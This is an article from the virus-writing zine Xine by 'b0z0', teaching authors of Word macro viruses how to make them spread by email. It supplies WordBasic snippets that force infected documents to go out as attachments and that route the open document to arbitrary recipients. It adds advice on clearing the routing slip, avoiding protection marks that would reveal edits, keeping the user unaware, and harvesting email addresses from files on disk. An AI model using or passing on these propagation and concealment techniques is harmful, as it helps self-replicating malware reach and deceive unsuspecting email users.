/-----------------------------\ | Xine - issue #2 - Phile 014 | \-----------------------------/ Introduction to mail features with Word by b0z0 0-Intro ------- Hi, this is a short quite boring text about mail support in Word. Since Word may be also used as a mail editor it would be definitely cool that wordmacro viruses may expand themselves via email. I'll try to explain in a few words how a virus may be email compatible. This text isn't likely to cover any aspect of Word by mail, but i'll rather talk just about what i noticed when playing with Word months and months ago. Since i leaved the whole stuff a lot of time ago (and i don't think i'll get it back out :) ) some things may be a little too fastly described, so just strike a few F1-s if you're going to implement this things in your virus... of course the entire mail routines has been fully tested (and approved :) ) on a network. Short notes about mail support in wordbasic ------------------------------------------- Some Word users may use Word also as a mail editor. Infact with Word a user can also send documents as emails to other users. As far as i know anyway there aren't a lot of users that uses Word as mail editor. Virus mailing is quite difficoult to do in an efficent way, but there are some thing that you may add to your virus that will at least partially give the power to replicate by email. Ah, pay attention, mail support isn't avaiable in Word 6.0, so take care. -) Forcing the user to attach ----------------------------- The most simple way to try to force the user to send the Word document as an attachment and not as a simple text file (this of course mean that if the file is infected then Word will send the entire document will all of your macros) is to force in the options the MailAsAttachment feature. This is very simply done in your macro with a: ToolsOptionsGeneral .SendMailAttach = 1 In this way when the user will try to send a mail with the SendMail from the File menu Word will automatically put the DOC as an attachment instead of converting it to plain text. Of course you can decide if force the MailAsAttachment every time that the user sends a mail (so you can just this in the FileSendMail macro before calling the real one) or just randomly. Of course if the user will try to disable the SendMailAttach but will not have success he may became suspicious, on the other side a heavy forcing may be more effective. -) Sending a Mail outside ------------------------- With Word you can of course also send a mail to outside. In the way i am going to explain here you will not send directly a mail, but you'll rather route this document to one or more recipients. FileRoutingSlip .Subject = "GoodTimes, hehehe", \ .Message = "Read or DIE!", .AllAtOnce = 1, .Addslip FileRoutingSlip .Address = "me@here.com", .Addrecipient FileRoutingSlip .Address = "you@cia.gov", .Addrecipient FileRoutingSlip .RouteDocument Let's examine the example. In the first line (the "\" only splits the line beacuse it was too long ;) ) we define: - the subject of the message ("GoodTimes, hehehe" :) ) - the message that will be included in the mail - the way that the message will be sent. "AllAtOnce = 1" means that word will do a Cc: to all the recipients at once instead of sending just an email to the first. Finally in the first line with ".Addslip" we define that we are adding a slip to the document (a routing slip as called in Word is such a method to route a document between various persons, so anyone can see how it's going the work and correct errors or something like. Word can manage to automatically send the document with a routing slip at some events, like save or close). In the second and the third line we just add two recipients and, finally, in the last line of the example we send the document. That's quite easy in this way, isn't it? :) When sending documents in this way the document will be always sent as an attachment, indifferently from the options. The user(s) will recive a mail with the document attachment that looks like (just body included): ----------->[snip]<------------ Read or DIE! The document below has a routing slip. When you are done reviewing this document, choose Send from the Word File menu to return the document to its sender. ----------->[snip]<------------ After our message as you can see the note that the document has a routing slip, but don't worry, Word users will read this after the DOC reading :) Another important thing concerning the FileRoutingSlip command is the ".Protect = x" (where x can be a number from 0 to 3). This argument specifies the type of protection that the document has. If the document has no protection (0) then the sender can change its contents without any problem. If the protection is set at 1 then the changes will be noticed (with another color) and so on.... If you forgot to disable protection (".Protect = 0") then after you will send with your macro the documents around, the user, at the first change, will notice that something changed ;) the changes infact will be signaled in underscore font. So DON'T forgot to disable protection! After you routed the message anyway the routing slip for the document will still remain active, so if the user will go in the File menu at the EditRoutingSlip he may see that someone modified (or created) the routing slip. Of course you can delete the entire routing slip for the current document: FileRoutingSlip .ClearSlip Or alternatively delete just the recipients: FileRoutingSlip .ClearRecipients There isn't a good way to delete just one recipient that you may have added. As for this way to expand the virus activities by email you must pay attention that you won't alert the user in any way. Infact you can just try to send emails around without to know if even the user has configured the mail system. So be careful WHERE you put a macro like this. To be quite sure that it will work you may put this after the FileSendMail, supposing that if he sends mail then the system is maybe also configured for that. For the addresses: well, be creative! :) search in the document, in some various standard files on the disk... look somewhere for them ;) -) Final words about email diffusion ------------------------------------ As you may noticed mail distribuition with Word isn't very reailable. It may be very risky to include macros that sends mail around. Warning and errors may be too difficoult to handle. Anyway the first method (very simple and not as much efficent) may be used by any macrovirus. Infact the user won't care too much about that (i think) and also you don't have to risk that the mail stuff isn't configured, just because you just set a variable in the options. In this way at least in some cases your virus will be fully email compatible ;)